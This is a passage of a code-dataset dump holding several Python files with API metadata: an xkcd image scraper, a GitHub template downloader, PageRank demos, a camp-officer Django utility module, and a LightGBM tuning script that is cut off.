"line_number": 965, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 965, "usage_type": "name"}, {"api_name": "hparams.hparams.batch_size", "line_number": 966, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 966, "usage_type": "name"}, {"api_name": "hparams.hparams.num_workers", "line_number": 967, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 967, "usage_type": "name"}, {"api_name": "hparams.hparams.pin_memory", "line_number": 968, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 968, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 970, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 975, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 975, "usage_type": "name"}, {"api_name": "hparams.hparams.initial_learning_rate", "line_number": 976, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 976, "usage_type": "name"}, {"api_name": "hparams.hparams.adam_beta1", "line_number": 977, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 977, "usage_type": "name"}, {"api_name": "hparams.hparams.adam_beta2", "line_number": 977, "usage_type": "attribute"}, {"api_name": "hparams.hparams.adam_eps", "line_number": 978, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 978, "usage_type": "name"}, {"api_name": "hparams.hparams.weight_decay", "line_number": 978, "usage_type": "attribute"}, {"api_name": "hparams.hparams.amsgrad", "line_number": 979, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 979, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 1001, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 1002, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1002, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1004, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1004, "usage_type": "name"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 1006, "usage_type": "call"}, {"api_name": "hparams.hparams.initial_learning_rate", "line_number": 1011, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1011, "usage_type": "name"}, {"api_name": "hparams.hparams.checkpoint_interval", "line_number": 1013, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1013, "usage_type": "name"}, {"api_name": "hparams.hparams.nepochs", "line_number": 1014, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1014, "usage_type": "name"}, {"api_name": "hparams.hparams.clip_thresh", "line_number": 1015, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1015, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 1023, "usage_type": "call"}]} +{"seq_id": "9121433617", "text": "\r\nimport requests as R\r\nfrom bs4 import BeautifulSoup \r\nimport os\r\nimport re\r\nimport time\r\nimport urllib.request #下載圖片\r\n\r\ndef get_page(url):\r\n #得到page\r\n headers = {\"user-agent\" : \r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\"\r\n }\r\n resp = R.get(url, headers = headers)\r\n if resp.status_code != 200:\r\n print(\"NG\")\r\n quit()\r\n return resp.text\r\n\r\ndef download(url,name):\r\n #下載圖片用\r\n urllib.request.urlretrieve(url,\"xkcd\\\\\" + name)\r\n print(\"Processing:%s...\" 
%name)\r\n time.sleep(1)\r\nif __name__ == \"__main__\":\r\n\r\n number = int(input(\"請輸入下載圖片數量\\n\"))\r\n if not os.path.exists(\"xkcd\"): #判斷資料夾是否存在\r\n os.mkdir(\"xkcd\")\r\n\r\n html = get_page(\"https://xkcd.com/\") #第一次先用https://xkcd.com/ 來找最新網址篇數\r\n pars = BeautifulSoup(html,\"html.parser\")\r\n latest_url = pars.find(\"meta\", property =\"og:url\").get(\"content\") #這裡存放最新的文章篇數\r\n\r\n #利用正規表達法來取得最新數字-----------\r\n rule = re.compile(r\"\\d\\d\\d\\d\") #re\r\n latest_number = rule.search(latest_url)\r\n temp_number = int(latest_number.group())\r\n #---------------------------------\r\n\r\n for i in range(number): #利用下載次數來求文章篇數\r\n temp_number = temp_number - i \r\n #每次都扣i 往前瀏覽 例如: 2565 - 1 = 2564 // 2565 -2 = 2563...\r\n html = get_page(\"https://xkcd.com/\" + str(temp_number)) #接下來用得到的數字開始做迴圈\r\n pars = BeautifulSoup(html,\"html.parser\")\r\n pic_link = pars.find(\"div\", id=\"comic\").find(\"img\").get(\"src\")\r\n pic_link = \"http:\" + pic_link\r\n #取得連結\r\n rule = re.compile(r\"s/(.*)\") #取得圖檔名稱\r\n temp = rule.search(pic_link)\r\n pic_name = temp.group()[2:]\r\n #取得圖檔名稱\r\n download(pic_link, pic_name)\r\n\r\n\r\n\r\n\r\n", "repo_name": "Jason-Huang-S/Python-web-crawler", "sub_path": "下載指定頁數的圖片.py", "file_name": "下載指定頁數的圖片.py", "file_ext": "py", "file_size_in_byte": 1980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 22, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 22, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 29, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 32, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "9334562209", "text": "import os\nimport zipfile\nimport requests\nfrom giturlparse import parse\n\nfrom abc import ABCMeta\nfrom abc import abstractmethod\n\nfrom shellfoundry.utilities.template_versions import TemplateVersions\nfrom shellfoundry.exceptions import VersionRequestException\n\n\nclass DownloadedRepoExtractor:\n def __init__(self):\n pass\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def extract_to_folder(self, repo_link, folder):\n pass\n\n\nclass ZipDownloadedRepoExtractor (DownloadedRepoExtractor):\n\n def extract_to_folder(self, repo_link, folder):\n with zipfile.ZipFile(repo_link, \"r\") as z:\n infos = z.infolist()\n z.extractall(folder)\n return [info.filename for info in infos]\n\n\nclass RepositoryDownloader:\n def __init__(self, repo_extractor=ZipDownloadedRepoExtractor()):\n self.repo_extractor = repo_extractor\n\n def download_template(self, target_dir, repo_address, branch=None):\n user, repo = self._parse_repo_url(repo_address)\n if not branch:\n branch = self._get_latest_branch((user, repo))\n download_url = self._join_url_all(\"https://api.github.com/repos\", [user, repo, 'zipball', branch])\n archive_path = ''\n try:\n archive_path = self._download_file(download_url, 
target_dir)\n\n repo_content = self.repo_extractor.extract_to_folder(archive_path, target_dir)\n\n # The first entry is always the root folder by git zipball convention\n root_dir = repo_content[0]\n\n return os.path.join(target_dir, root_dir)\n\n finally:\n if os.path.exists(archive_path):\n os.remove(archive_path)\n\n def _join_url_all(self, url, fragments):\n for frag in fragments:\n url = url + '/' + frag\n return url\n\n def _try_parse_git_url(self, url):\n if url.startswith('git@'):\n parsed_repo = parse(url)\n return True, parsed_repo.owner, parsed_repo.repo\n else:\n return False, None, None\n\n def _try_parse_http_url(self, url):\n if url.startswith('http'):\n fragments = url.split(\"/\")\n return True, fragments[-2], fragments[-1]\n else:\n return False, None, None\n\n def _parse_repo_url(self, url):\n success, user, repo = self._try_parse_git_url(url)\n if not success:\n success, user, repo = self._try_parse_http_url(url)\n\n return user, repo\n\n def _download_file(self, url, directory):\n local_filename = os.path.join(directory, url.split('/')[-1])\n # NOTE the stream=True parameter\n r = requests.get(url, stream=True)\n if r.status_code != requests.codes.ok:\n raise VersionRequestException('Failed to download zip file from {}'.format(url))\n with open(local_filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n # f.flush() commented by recommendation from J.F.Sebastian\n return local_filename\n\n def _get_latest_branch(self, repo):\n return next(iter(TemplateVersions(*repo).get_versions_of_template()))\n", "repo_name": "menib/shellfoundry", "sub_path": "shellfoundry/utilities/repository_downloader.py", "file_name": "repository_downloader.py", "file_ext": "py", "file_size_in_byte": 3225, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABCMeta", "line_number": 17, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 19, "usage_type": "name"}, {"api_name": "zipfile.ZipFile", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 55, "usage_type": "call"}, {"api_name": "giturlparse.parse", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 87, "usage_type": "attribute"}, {"api_name": "shellfoundry.exceptions.VersionRequestException", "line_number": 88, "usage_type": "call"}, {"api_name": "shellfoundry.utilities.template_versions.TemplateVersions", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "34065835829", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[10]:\n\n\nimport networkx as nx\nimport random\nimport matplotlib.pyplot as plt\nimport operator\nG=nx.gnp_random_graph(10,0.5,directed=True) #.5 for edge creation prob.\nnx.draw(G,with_labels= True)\nplt.show()\nx=random.choice([i for i in range(G.number_of_nodes())]) #random source node\ndict_counter={}\nfor i in range(G.number_of_nodes()):\n 
dict_counter[i]=0\ndict_counter[x]=dict_counter[x]+1\nfor i in range(1000000): #we iterate here and wait for convergence of the points distributed\n list_n= list(G.neighbors(x))\n if(len(list_n)==0): #if x is sink(no neighbor)\n x=random.choice([i for i in range(G.number_of_nodes())])\n dict_counter[x]=dict_counter[x]+1\n else:\n x=random.choice(list_n)\n dict_counter[x]=dict_counter[x]+1\np=nx.pagerank(G)\nsorted_p= sorted(p.items(), key= operator.itemgetter(1))\nsorted_rw= sorted(dict_counter.items(), key= operator.itemgetter(1))\nprint(sorted_p)\nprint(sorted_rw)\n#we now match if the order comes in same as like 5-> 3-> ... otherwise increase the iterations\n\n\n# In[25]:\n\n\nimport networkx as nx\nimport random\nimport matplotlib.pyplot as plt\n\ndef add_edges():\n nodes= list(G.nodes())\n for s in nodes:\n for t in nodes:\n if s != t:\n r=random.random()\n if r<0.5:\n G.add_edge(s,t)\n return G\n\ndef ap(G):\n nodes= list(G.nodes())\n p=[]\n for each in nodes:\n p.append(100) #we assign point to each node \n return p\n\ndef distribute_points(G, points):\n nodes= list(G.nodes())\n new_points=[]\n for i in range(len(nodes)):\n new_points.append(0)\n for n in nodes:\n out=list(G.out_edges(n))\n if(len(out)==0):\n new_points=new_points[n]+points[n]\n else:\n share= points[n]/len(out)\n for(src, tgt) in out:\n new_points[tgt]= new_points[tgt]+share\n return new_points\n \ndef keep_distributing(points, G):\n while(1):\n new_points= distribute_points(G, points)\n print(new_points)\n points= new_points\n stop=input(\"press n to stop or any other key to continue\")\n if stop==\"n\":\n break\n else:\n continue\n return new_points\n \ndef rank_by_points(final_points):\n d={}\n for i in range(len(points)):\n d[i]= points[i]\n print(sorted(d.items(), key=lambda f:f[1]))\n \nG=nx.DiGraph() # a directed graph\nG.add_nodes_from([i for i in range(10)])\nG=add_edges()\nnx.draw(G,with_labels= True)\nplt.show()\n#assign points\npoints= ap(G)\n#distribute // convergence\nfinal_points= keep_distributing(points, G)\n#rank by points\nrank_by_points(final_points)\nprint(\"now compare it\")\nresult= nx.pagerank(G)\nprint(sorted(result.items(), key=lambda f:f[1]))\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "hitiksaini/google-pagerank-algorithm", "sub_path": "How does Google Work.py", "file_name": "How does Google Work.py", "file_ext": "py", "file_size_in_byte": 2822, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "networkx.gnp_random_graph", "line_number": 11, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 14, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "networkx.pagerank", "line_number": 27, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 28, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 29, "usage_type": "call"}, {"api_name": "random.random", "line_number": 47, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 92, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 96, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "networkx.pagerank", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "70235012328", "text": "\"\"\"\nUtility functions for officers app.\n\"\"\"\nfrom collections import defaultdict\n\nfrom cciw.accounts.models import User\nfrom cciw.cciwmain.models import Camp\nfrom cciw.utils.spreadsheet import ExcelSimpleBuilder\n\n\ndef camp_officer_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns complete list of officers for a camp\n \"\"\"\n return list(camp.officers.all().order_by(\"first_name\", \"last_name\", \"email\"))\n\n\ndef camp_slacker_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns list of officers who have not filled out an application form\n \"\"\"\n from cciw.officers.applications import applications_for_camp\n\n finished_apps_ids = applications_for_camp(camp).values_list(\"officer__id\", flat=True)\n return list(camp.officers.order_by(\"first_name\", \"last_name\", \"email\").exclude(id__in=finished_apps_ids))\n\n\ndef camp_serious_slacker_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns a list of officers who have serious problems in terms\n of submitted applications and references.\n \"\"\"\n # This looks at history - so we find officers who have been on camps before.\n # We also look across all the camps, to catch officers who might go from one\n # camp to the next, never submitting application forms or references. This\n # means the logic is slightly different than 'applications_for_camp', but as\n # this is meant as a warning system it doesn't matter that it doesn't match\n # the logic exactly.\n\n from cciw.cciwmain.models import Camp\n from cciw.officers.models import Application, DBSCheck, Invitation, Reference\n\n officers = [i.officer for i in camp.invitations.all()]\n # We need to allow applications/references for the current year to 'fix' a\n # track record. However, when displaying past problems, don't include the\n # current year.\n relevant_camps = list(Camp.objects.filter(year__lte=camp.start_date.year).order_by(\"-start_date\"))\n\n if len(relevant_camps) == 0:\n return []\n\n latest_camp = relevant_camps[0]\n\n all_invitations = list(\n Invitation.objects.filter(camp__in=relevant_camps, officer__in=officers).select_related(\"camp\", \"officer\")\n )\n all_apps = list(\n Application.objects.filter(finished=True, officer__in=officers, date_saved__lte=latest_camp.start_date)\n )\n\n all_received_refs = list(Reference.objects.select_related(\"referee\").filter(referee__application__in=all_apps))\n\n all_dbss = list(DBSCheck.objects.filter(officer__in=officers))\n\n received_ref_dict = defaultdict(list)\n for ref in all_received_refs:\n received_ref_dict[ref.referee.application_id].append(ref)\n\n # For each officer, we need to build a list of the years when they were on\n # camp but failed to submit an application form.\n\n # If they failed to submit two references, we also need to show them. 
(If\n # they didn't submit an application form then they will definitely have\n # missing references).\n\n # Dictionaries containing officers as key, and a list of camps as values:\n officer_apps_missing = defaultdict(list)\n officer_apps_present = defaultdict(list)\n officer_refs_missing = defaultdict(list)\n officer_refs_present = defaultdict(list)\n officer_dbss_missing = defaultdict(list)\n officer_dbss_present = defaultdict(list)\n officer_apps_last_good_year = {}\n officer_refs_last_good_year = {}\n officer_dbss_last_good_year = {}\n\n for c in relevant_camps:\n camp_officers = {i.officer for i in all_invitations if i.camp == c}\n camp_applications = [a for a in all_apps if a.could_be_for_camp(c)]\n officers_with_applications = {a.officer for a in camp_applications}\n officers_with_two_references = {a.officer for a in camp_applications if len(received_ref_dict[a.id]) >= 2}\n officers_with_dbss = {dbs.officer for dbs in all_dbss if dbs.could_be_for_camp(c)}\n\n for o in camp_officers:\n if o in officers_with_applications:\n officer_apps_present[o].append(c)\n else:\n officer_apps_missing[o].append(c)\n if o in officers_with_two_references:\n officer_refs_present[o].append(c)\n else:\n officer_refs_missing[o].append(c)\n if o in officers_with_dbss:\n officer_dbss_present[o].append(c)\n else:\n officer_dbss_missing[o].append(c)\n\n # We only care about missing applications if they are not\n # followed by submitted applications i.e. an officer fixes\n # their past record by submitting one application.\n\n def sort_camps(camps):\n camps.sort(key=lambda camp: camp.start_date)\n\n def sort_camps_reverse(camps):\n camps.sort(key=lambda camp: camp.start_date, reverse=True)\n\n def get_missing_and_present_lists(present_dict, missing_dict, last_good_year_dict):\n for officer, camps in present_dict.items():\n if camps:\n sort_camps(camps)\n last_camp_with_item = camps[-1]\n missing_camps = missing_dict[officer]\n new_missing_camps = [c for c in missing_camps if c.start_date > last_camp_with_item.start_date]\n missing_dict[officer] = new_missing_camps\n last_good_year_dict[officer] = last_camp_with_item.year\n\n for officer, camps in missing_dict.items():\n sort_camps_reverse(camps)\n\n # Don't show missing applications/references from current year\n for officer, camps in missing_dict.items():\n missing_dict[officer] = [c for c in camps if c.year < camp.year]\n\n get_missing_and_present_lists(officer_apps_present, officer_apps_missing, officer_apps_last_good_year)\n get_missing_and_present_lists(officer_refs_present, officer_refs_missing, officer_refs_last_good_year)\n get_missing_and_present_lists(officer_dbss_present, officer_dbss_missing, officer_dbss_last_good_year)\n\n tmp1 = [\n (o, officer_apps_missing[o], officer_refs_missing[o], officer_dbss_missing[o])\n for o in (\n set(officer_apps_missing.keys()) | set(officer_refs_missing.keys()) | set(officer_dbss_missing.keys())\n )\n ]\n # Remove empty items:\n tmp1 = [(o, a, r, c) for (o, a, r, c) in tmp1 if len(a) > 0 or len(r) > 0 or len(c) > 0]\n return [\n {\n \"officer\": o,\n \"missing_application_forms\": a,\n \"missing_references\": r,\n \"missing_dbss\": c,\n \"last_good_apps_year\": officer_apps_last_good_year.get(o),\n \"last_good_refs_year\": officer_refs_last_good_year.get(o),\n \"last_good_dbss_year\": officer_dbss_last_good_year.get(o),\n }\n for o, a, r, c in tmp1\n ]\n\n\ndef officer_data_to_spreadsheet(camp: Camp):\n spreadsheet = ExcelSimpleBuilder()\n # Import here to avoid import cycle\n from cciw.officers.applications 
import applications_for_camp\n\n # All the data we need:\n invites = (\n camp.invitations.all().select_related(\"officer\", \"role\").order_by(\"officer__first_name\", \"officer__last_name\")\n )\n apps = applications_for_camp(camp).prefetch_related(\"qualifications\")\n app_dict = {app.officer.id: app for app in apps}\n\n # Attributes we need\n app_attr_getter = lambda attr: lambda user, inv, app: getattr(app, attr) if app is not None else \"\"\n columns = [\n (\"First name\", lambda u, inv, app: u.first_name),\n (\"Last name\", lambda u, inv, app: u.last_name),\n (\"Email\", lambda u, inv, app: u.email),\n (\"Role\", lambda u, inv, app: inv.role.name if inv.role else \"\"),\n (\"Address\", app_attr_getter(\"address_firstline\")),\n (\"Town\", app_attr_getter(\"address_town\")),\n (\"County\", app_attr_getter(\"address_county\")),\n (\"Post code\", app_attr_getter(\"address_postcode\")),\n (\"Country\", app_attr_getter(\"address_country\")),\n (\"Tel\", app_attr_getter(\"address_tel\")),\n (\"Mobile\", app_attr_getter(\"address_mobile\")),\n (\"Birth date\", app_attr_getter(\"birth_date\")),\n ]\n\n header_row = [h for h, f in columns]\n\n def data_rows():\n for inv in invites:\n user = inv.officer\n app = app_dict.get(user.id)\n row = []\n for header, f in columns:\n row.append(f(user, inv, app))\n yield row\n\n spreadsheet.add_sheet_with_header_row(\"Officers\", header_row, data_rows())\n\n # Qualifications sheet\n spreadsheet.add_sheet_with_header_row(\n \"Qualifications\",\n [\"First name\", \"Last name\", \"Qualification\", \"Date issued\"],\n [\n [a.officer.first_name, a.officer.last_name, q.type.name, q.date_issued]\n for a in apps\n for q in a.qualifications.all()\n ],\n )\n\n spreadsheet.add_sheet_with_header_row(\n \"Dietary Requirements\",\n [\"First name\", \"Last name\", \"Requirements\"],\n [[a.officer.first_name, a.officer.last_name, a.dietary_requirements] for a in apps if a.dietary_requirements],\n )\n return spreadsheet\n", "repo_name": "cciw-uk/cciw.co.uk", "sub_path": "cciw/officers/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 8987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cciw.cciwmain.models.Camp", "line_number": 11, "usage_type": "name"}, {"api_name": "cciw.accounts.models.User", "line_number": 11, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 18, "usage_type": "name"}, {"api_name": "cciw.officers.applications.applications_for_camp", "line_number": 24, "usage_type": "call"}, {"api_name": "cciw.accounts.models.User", "line_number": 18, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 28, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp.objects.filter", "line_number": 47, "usage_type": "call"}, {"api_name": "cciw.cciwmain.models.Camp.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 47, "usage_type": "name"}, {"api_name": "cciw.officers.models.Invitation.objects.filter", "line_number": 55, "usage_type": "call"}, {"api_name": "cciw.officers.models.Invitation.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.Invitation", "line_number": 55, "usage_type": "name"}, {"api_name": "cciw.officers.models.Application.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "cciw.officers.models.Application.objects", "line_number": 58, "usage_type": "attribute"}, 
{"api_name": "cciw.officers.models.Application", "line_number": 58, "usage_type": "name"}, {"api_name": "cciw.officers.models.Reference.objects.select_related", "line_number": 61, "usage_type": "call"}, {"api_name": "cciw.officers.models.Reference.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.Reference", "line_number": 61, "usage_type": "name"}, {"api_name": "cciw.officers.models.DBSCheck.objects.filter", "line_number": 63, "usage_type": "call"}, {"api_name": "cciw.officers.models.DBSCheck.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.DBSCheck", "line_number": 63, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 65, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 77, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 78, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 79, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 80, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 81, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 82, "usage_type": "call"}, {"api_name": "cciw.accounts.models.User", "line_number": 28, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 161, "usage_type": "name"}, {"api_name": "cciw.utils.spreadsheet.ExcelSimpleBuilder", "line_number": 162, "usage_type": "call"}, {"api_name": "cciw.officers.applications.applications_for_camp", "line_number": 170, "usage_type": "call"}]} +{"seq_id": "28695557447", "text": "import numpy as np\r\nimport pandas as pd\r\nimport xgboost as xgb\r\nimport lightgbm\r\nfrom sklearn.model_selection import StratifiedKFold, KFold\r\nfrom sklearn.metrics import f1_score, log_loss\r\nfrom bayes_opt import BayesianOptimization\r\n\"\"\" ====================== Function definitions ========================== \"\"\"\r\ndef BayesianSearch(clf, params):\r\n \"\"\"贝叶斯优化器\"\"\"\r\n # 迭代次数\r\n num_iter = 25\r\n init_points = 5\r\n # 创建一个贝叶斯优化对象,输入为自定义的模型评估函数与超参数的范围\r\n bayes = BayesianOptimization(clf, params)\r\n # 开始优化\r\n bayes.maximize(init_points=init_points, n_iter=num_iter)\r\n # 输出结果\r\n params = bayes.res['max']\r\n print(params['max_params'])\r\n \r\n return params\r\n\r\ndef GBM_evaluate(min_child_samples, min_child_weight, colsample_bytree, max_depth, subsample, reg_alpha, reg_lambda):\r\n \"\"\"自定义的模型评估函数\"\"\"\r\n\r\n # 模型固定的超参数\r\n param = {\r\n 'objective': 'regression',\r\n 'n_estimators': 275,\r\n 'metric': 'rmse',\r\n 'random_state': 2020}\r\n\r\n # 贝叶斯优化器生成的超参数\r\n param['min_child_weight'] = int(min_child_weight)\r\n param['colsample_bytree'] = float(colsample_bytree),\r\n param['max_depth'] = int(max_depth),\r\n param['subsample'] = float(subsample),\r\n param['reg_lambda'] = float(reg_lambda),\r\n param['reg_alpha'] = float(reg_alpha),\r\n param['min_child_samples'] = int(min_child_samples)\r\n\r\n # 5-flod 交叉检验,注意BayesianOptimization会向最大评估值的方向优化,因此对于回归任务需要取负数。\r\n # 这里的评估函数为neg_mean_squared_error,即负的MSE。\r\n val = cross_val_score(lgb.LGBMRegressor(**param),\r\n train_X, train_y ,scoring='neg_mean_squared_error', cv=5).mean()\r\n\r\n return val\r\n\r\ndef LGB(params, train_x, train_y):\r\n predictors = list(train_x.columns)\r\n train_x = train_x.values\r\n folds = 5\r\n seed = 202\r\n kf = StratifiedKFold(n_splits = folds, shuffle = True, random_state = seed)\r\n #kf = KFold(n_splits = folds, shuffle = True, 
random_state = seed)\r\n train = np.zeros((train_x.shape[0], 3))\r\n test = np.zeros((test_x.shape[0], 3))\r\n test_pre = np.zeros((folds, test_x.shape[0], 3))\r\n test_pre_all = np.zeros((folds, test_x.shape[0]))\r\n cv_scores = []\r\n f1_scores = []\r\n cv_rounds = []\r\n\r\n for i, (train_index, verify_index) in enumerate(kf.split(train_x, train_y)):\r\n tr_x = train_x[train_index]\r\n tr_y = train_y[train_index]\r\n ve_x = train_x[verify_index]\r\n ve_y = train_y[verify_index]\r\n\r\n train_matrix = lightgbm.Dataset(tr_x, label = tr_y)\r\n verify_matrix = lightgbm.Dataset(ve_x, label = ve_y)\r\n\r\n num_round = 6000\r\n early_stopping_rounds = 1000\r\n if verify_matrix:\r\n model = lightgbm.train(params, train_matrix, num_round, \r\n valid_sets = verify_matrix, \r\n verbose_eval = 50,\r\n early_stopping_rounds = early_stopping_rounds\r\n )\r\n verify_res = model.predict(ve_x, \r\n num_iteration = model.best_iteration\r\n )\r\n pred = model.predict(test_x, num_iteration = model.best_iteration)\r\n train[verify_index] = verify_res\r\n test_pre[i, :] = pred\r\n pre_y = np.argmax(verify_res, axis = 1)\r\n f1_list = f1_score(ve_y, pre_y, average = None)\r\n f1 = 0.2*f1_list[0] + 0.2*f1_list[1] + 0.6*f1_list[2]\r\n \r\n f1_scores.append(f1)\r\n test_pre_all[i, :] = np.argmax(pred, axis=1)\r\n\r\n f1_mean = np.mean(f1_scores)\r\n\r\n return f1_mean\r\n\r\ndef lgb_cv(feature_fraction,bagging_fraction,bagging_freq,learning_rate,num_leaves,min_child_weight,\r\n min_data_in_leaf,max_depth,min_split_gain,lambda_l2,num_iterations=5000):\r\n params = {\r\n 'boosting_type': 'gbdt',\r\n 'objective':'multiclass',\r\n 'metric':'multi_logloss',\r\n 'nthread': 6,'num_class':3,'verbose': -1,}\r\n\r\n params['min_child_weight'] = max(min_child_weight, 0)\r\n params[\"num_leaves\"] = int(round(num_leaves))\r\n params['lambda_l2'] = max(lambda_l2, 0)\r\n params['feature_fraction'] = max(min(feature_fraction, 1), 0)\r\n params['bagging_fraction'] = max(min(bagging_fraction, 1), 0)\r\n params['bagging_freq'] = int(round(bagging_freq))\r\n params['learning_rate'] = max(min(learning_rate, 1), 0)\r\n params[\"min_data_in_leaf\"] = int(round(min_data_in_leaf))\r\n params['max_depth'] = int(round(max_depth))\r\n params['min_split_gain'] = min_split_gain\r\n \r\n f1_result = LGB(params, train_x, train_y)\r\n return f1_result\r\n\r\n\"\"\" ======================= Load Training Data ======================= \"\"\"\r\npath = \"I:/TianChi/data/\" #存放数据的地址\r\nresult_path = \"I:/TianChi/data/\" #存放数据的地址\r\ntrain_json = pd.read_json(path + \"train_target.json\")\r\ntest_json = pd.read_json(path + \"test_target.json\")\r\n\r\ntrain_features = pd.read_csv(path + 'train_feature3000_rate0.5_w3_tr0.5_new.csv')\r\ntest_features = pd.read_csv(path + 'test_feature3000_rate0.5_w3_tr0.5_new.csv')\r\ntrain_df = pd.read_csv(path + 'train_feature3000_timecn_new.csv')\r\ntest_df = pd.read_csv(path + 'test_feature3000_timecn_new.csv')\r\nX = pd.read_csv(path + 'train_feature3000_fromJ.csv')\r\nX_test = pd.read_csv(path + 'test_feature3000_fromJ.csv')\r\n\r\n\"\"\" ====================== Variable Declaration ========================== \"\"\"\r\nselect_features = [\r\n \"rate1_mean\",\r\n \"rate1_std\",\r\n \"rate2_mean\",\r\n \"rate2_std\",\r\n \"number1_mean\",\r\n \"number1_std\",\r\n \"number2_mean\",\r\n \"number2_std\",\r\n 'square_mean', \r\n 'square_std',\r\n #'number_mean', \r\n #'number_std',\r\n 'car1_mean',\r\n 'car2_mean',\r\n 'truck1_mean',\r\n 'truck2_mean',\r\n #'bus1_mean',\r\n #'bus2_mean',\r\n #'motorbike1_mean',\r\n 
